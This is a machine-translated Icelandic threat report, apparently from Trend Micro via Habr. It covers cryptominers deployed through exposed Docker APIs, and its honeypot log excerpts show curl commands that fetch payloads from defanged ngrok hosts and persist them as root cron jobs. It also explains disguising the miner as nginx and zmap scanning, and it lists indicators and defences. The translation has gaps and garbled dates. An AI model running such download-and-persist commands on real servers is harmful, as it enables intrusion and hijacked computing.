Við greindum gögnin sem safnað var með honeypot-ílátum, sem við bjuggum til til að fylgjast með ógnum. Og við fundum umtalsverða virkni frá óæskilegum eða óviðkomandi námuverkamönnum í dulritunargjaldmiðli sem notaðir voru sem fantur gámar með því að nota samfélagið birta mynd á Docker Hub. Myndin er notuð sem hluti af þjónustu sem skilar illgjarnum námuverkamönnum dulritunargjaldmiðils.
Að auki eru forrit til að vinna með netkerfi sett upp til að komast í gegnum opna nálæga gáma og forrit.
Við látum honeypots okkar vera eins og þær eru, það er með sjálfgefnum stillingum, án öryggisráðstafana eða síðari uppsetningar á viðbótarhugbúnaði. Vinsamlegast athugaðu að Docker hefur ráðleggingar um upphaflega uppsetningu til að forðast villur og einfalda veikleika. En hunangspottarnir sem notaðir eru eru ílát, hönnuð til að greina árásir sem beinast að gámasvæðinu, ekki forritin inni í gámunum.
Skaðleg virkni sem fannst er einnig athyglisverð vegna þess að hún krefst ekki varnarleysis og er einnig óháð Docker útgáfunni. Að finna rangt stillta og þar af leiðandi opna gámamynd er allt sem árásarmenn þurfa til að smita marga opna netþjóna.
Ólokað Docker API gerir notandanum kleift að framkvæma fjölbreytt úrval af , þar á meðal að fá lista yfir hlaupandi gáma, fá logs frá tilteknum gámi, ræsa, stöðva (þar á meðal þvinguð) og jafnvel búa til nýjan gáma úr tiltekinni mynd með tilgreindum stillingum.
Vinstra megin er afhendingaraðferð spilliforrita. Hægra megin er umhverfi árásarmannsins, sem gerir kleift að fjarstýra myndum.
Dreifing eftir löndum á 3762 opnum Docker API. Byggt á Shodan leit dagsettri 12.02.2019/XNUMX/XNUMX
Valkostir árásarkeðju og hleðslu
Illgjarn virkni fannst ekki aðeins með hjálp hunangspotta. Gögn frá Shodan sýna að fjöldi óvarinna Docker APIs (sjá annað graf) hefur aukist síðan við rannsökuðum ranglega stilltan ílát sem notaður var sem brú til að nota Monero dulritunar-gjaldmiðilsnámuhugbúnað. Í október á síðasta ári (2018, núverandi gögn ca. þýðandi) það voru aðeins 856 opin API.
Athugun á honeypot logs sýndi að notkun gámamynda tengdist einnig notkun á , tól til að koma á öruggum tengingum eða framsenda umferð frá almennum aðgengilegum stöðum til tilgreindra heimilisfönga eða auðlinda (til dæmis localhost). Þetta gerir árásarmönnum kleift að búa til vefslóðir á virkan hátt þegar þeir afhenda hleðslu á opinn netþjón. Hér að neðan eru kóðadæmi úr annálunum sem sýna misnotkun á ngrok þjónustunni:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Eins og þú sérð er hlaðið niður skrám frá síbreytilegum vefslóðum. Þessar vefslóðir hafa stutta gildistíma, þannig að ekki er hægt að hlaða niður hleðslu eftir gildistíma.
Það eru tveir hleðsluvalkostir. Sá fyrsti er samsettur ELF námumaður fyrir Linux (skilgreint sem Coinminer.SH.MALXMR.ATNO) sem tengist námusundlauginni. Annað er handrit (TrojanSpy.SH.ZNETMAP.A) sem er hannað til að fá ákveðin netverkfæri sem notuð eru til að skanna netsvið og leita síðan að nýjum skotmörkum.
Droparhandritið setur tvær breytur, sem síðan eru notaðar til að nota dulritunargjaldmiðilinn. HOST breytan inniheldur slóðina þar sem illgjarnar skrár eru staðsettar og RIP breytan er skráarnafn (í raun kjötkássa) námumannsins sem á að dreifa. HOST breytan breytist í hvert skipti sem kjötkássabreytan breytist. Handritið reynir einnig að athuga hvort engir aðrir námuverkamenn í dulritunargjaldmiðli séu í gangi á netþjóninum sem ráðist er á.
Dæmi um HOST og RIP breytur, svo og kóðabút sem notaður er til að athuga hvort engir aðrir námumenn séu í gangi
Áður en námumaðurinn byrjar er hann endurnefndur í nginx. Aðrar útgáfur af þessu handriti endurnefna námumanninn í aðra lögmæta þjónustu sem gæti verið til staðar í Linux umhverfi. Þetta er venjulega nóg til að komast framhjá athugunum á listanum yfir ferla sem eru í gangi.
Leitarforskriftin hefur einnig eiginleika. Það virkar með sömu vefslóðaþjónustu til að nota nauðsynleg verkfæri. Meðal þeirra er zmap tvöfaldur, sem er notaður til að skanna netkerfi og fá lista yfir opnar hafnir. Handritið hleður einnig öðru tvöfalda forriti sem er notað til að hafa samskipti við þjónustuna sem finnast og taka á móti borðum frá þeim til að ákvarða frekari upplýsingar um þjónustuna sem fannst (til dæmis útgáfu hennar).
Handritið ákveður einnig fyrirfram nokkur netsvið til að skanna, en þetta fer eftir útgáfu handritsins. Það stillir einnig markgáttirnar frá þjónustunum - í þessu tilviki Docker - áður en skönnunin er keyrð.
Um leið og möguleg skotmörk finnast eru borðar sjálfkrafa fjarlægðir af þeim. Handritið síar einnig markmið eftir þjónustu, forritum, íhlutum eða vettvangi sem vekur áhuga: Redis, Jenkins, Drupal, MODX, , Docker 1.16 viðskiptavinur og Apache CouchDB. Ef skannaði þjónninn passar við einhvern þeirra er hann vistaður í textaskrá sem árásarmenn geta síðar notað til síðari greiningar og reiðhestur. Þessum textaskrám er hlaðið upp á netþjóna árásarmannanna í gegnum kraftmikla tengla. Það er að segja að sérstök vefslóð er notuð fyrir hverja skrá, sem þýðir að síðari aðgangur er erfiður.
Árásarvektorinn er Docker mynd, eins og sjá má í næstu tveimur kóða.
Efst er endurnefna í lögmæta þjónustu og neðst er hvernig zmap er notað til að skanna netkerfi
Efst eru fyrirfram skilgreind netsvið, neðst eru sérstakar hafnir til að leita að þjónustu, þar á meðal Docker
Skjáskotið sýnir að alpine-curl myndinni hefur verið hlaðið niður meira en 10 milljón sinnum
Byggt á Alpine Linux og curl, auðlindanýtnu CLI tóli til að flytja skrár yfir ýmsar samskiptareglur, geturðu smíðað . Eins og sjá má á fyrri myndinni hefur þessari mynd þegar verið hlaðið niður meira en 10 milljón sinnum. Mikill fjöldi niðurhala gæti þýtt að nota þessa mynd sem aðgangsstað; þessi mynd var uppfærð fyrir meira en sex mánuðum síðan; notendur sóttu ekki aðrar myndir frá þessari geymslu eins oft. Í Docker - sett af leiðbeiningum sem notað er til að stilla ílát til að keyra það. Ef stillingar inngangsstaðar eru rangar (til dæmis er gámurinn skilinn eftir opinn af internetinu) er hægt að nota myndina sem árásarvektor. Árásarmenn geta notað það til að afhenda hleðslu ef þeir finna ranglega stilltan eða opinn gám sem er óstuddur.
Það er mikilvægt að hafa í huga að þessi mynd (alpine-curl) sjálf er ekki illgjarn, en eins og þú sérð hér að ofan er hægt að nota hana til að framkvæma skaðlegar aðgerðir. Svipaðar Docker myndir er einnig hægt að nota til að framkvæma skaðlegar athafnir. Við höfðum samband við Docker og unnum með þeim í þessu máli.
Tillögur
stendur eftir fyrir mörg fyrirtæki, sérstaklega þau sem innleiða , með áherslu á hraðri þróun og afhendingu. Allt versnar af því að fara eftir endurskoðunar- og eftirlitsreglum, nauðsyn þess að fylgjast með gagnaleynd, sem og gífurlegan skaða af því að ekki sé farið að þeim. Að fella öryggissjálfvirkni inn í þróunarlífsferilinn hjálpar þér ekki aðeins að finna öryggisgöt sem annars gætu orðið óuppgötvuð, heldur hjálpar það þér líka að draga úr óþarfa vinnuálagi, eins og að keyra viðbótarhugbúnaðarsmíði fyrir hvern varnarleysi eða rangstillingar sem uppgötvast eftir að forrit hefur verið sett í notkun.
Atvikið sem fjallað er um í þessari grein undirstrikar nauðsyn þess að taka tillit til öryggis frá upphafi, þar á meðal eftirfarandi ráðleggingar:
- Fyrir kerfisstjóra og þróunaraðila: Athugaðu alltaf API stillingarnar þínar til að ganga úr skugga um að allt sé stillt til að samþykkja aðeins beiðnir frá tilteknum netþjóni eða innra neti.
- Fylgdu meginreglunni um minnstu réttindi: Gakktu úr skugga um að gámamyndir séu undirritaðar og staðfestar, takmarkaðu aðgang að mikilvægum hlutum (gámaræsingarþjónusta) og bættu dulkóðun við nettengingar.
- Fylgja og virkja öryggiskerfi, t.d. og innbyggður .
- Notaðu sjálfvirka skönnun á keyrslutíma og myndum til að fá frekari upplýsingar um ferla sem keyra í ílátinu (til dæmis til að greina skopstælingar eða leita að veikleikum). Forritastjórnun og heiðarleikavöktun hjálpa til við að rekja óeðlilegar breytingar á netþjónum, skrám og kerfissvæðum.
Trendmicro hjálpar DevOps teymum að byggja á öruggan hátt, rúlla út hratt og ræsa hvar sem er. Trend Micro Veitir öflugt, straumlínulagað og sjálfvirkt öryggi yfir DevOps leiðslu fyrirtækisins og býður upp á margar ógnarvarnir til að vernda líkamlegt, sýndar- og skýjaálag á keyrslutíma. Það bætir einnig gámaöryggi við и , sem skannar Docker gámamyndir fyrir spilliforrit og varnarleysi hvenær sem er í þróunarleiðslunni til að koma í veg fyrir ógnir áður en þeim er komið fyrir.
Merki um málamiðlun
Tengd kjötkássa:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Á Æfandi hátalarar sýna hvaða stillingar þarf að gera fyrst til að lágmarka líkurnar eða forðast algjörlega að ástandið sem lýst er hér að ofan komi upp. Og dagana 19-21 ágúst á netnámskeiði Hægt er að ræða þessi og svipuð öryggisvandamál við samstarfsmenn og starfandi kennara við hringborð þar sem allir geta tjáð sig og hlustað á sársauka og árangur reyndra samstarfsmanna.
Heimild: www.habr.com